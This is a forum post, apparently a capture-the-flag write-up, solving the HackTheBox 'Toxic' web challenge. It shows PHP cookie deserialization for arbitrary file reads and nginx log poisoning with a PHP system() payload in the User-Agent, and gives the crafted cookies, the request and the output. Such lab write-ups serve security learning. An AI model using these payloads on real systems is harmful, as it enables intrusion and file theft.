TUTORIAL Hackthebox Toxic web challenge writeup
by NopSled - May 05, 2021 at 02:36 AM
#1
this is a quick  writeup for the Toxic challenge.

Upon inspecting the challenge's files ,specifically index.php and PageModel.php we find that our phpsessid cookie is deserialised and the file to load on the screen is fetched from the deserialised object.

we convert our cookie from base64 to ascii and we end up with the object

Quote:┌──(kali㉿kali)-[~]
└─$ echo 'Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9' | base64 -d

O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}


we modify the object and we can read files from the server but we can't read the flag file because we don't know its name. So we try to poison the server logs.

Quote:echo 'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}' | base64
Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNz
LmxvZyI7fQo=


we send this new cookie to the server and we can read the log file.

Quote:GET / HTTP/1.1
Host: 127.0.0.1:1337
User-Agent: <?php system('ls /');?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


we send this request to poison the nginx log and when we display the log file again we get a directory listing

Quote:dev
entrypoint.sh
etc
flag_ySUHQ
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var


we construct a cookie to read the flag file ,we send it to the server and voila! we get the flag.

Quote:echo 'O:9:"PageModel":1:{s:4:"file";s:11:"/flag_ySUHQ";}' | base64

Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfeVNVSFEiO30K
Reply
#2
Damn what the fuck is this shit
Reply
#3
thanks for sharing this writeup
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Nuclear Sale Challenge coolencyclopedia 2 314 5 hours ago
Last Post: davebrew2
FLAG Schooled Hackthebox writeup sakthi2852 5 2,269 Yesterday at 04:13 AM
Last Post: warface
SELLING HTB Crypto Challenge Broken Decryptor Script Consigliere 1 412 May 07, 2021 at 09:20 AM
Last Post: Consigliere

 Users browsing this thread: 1 Guest(s)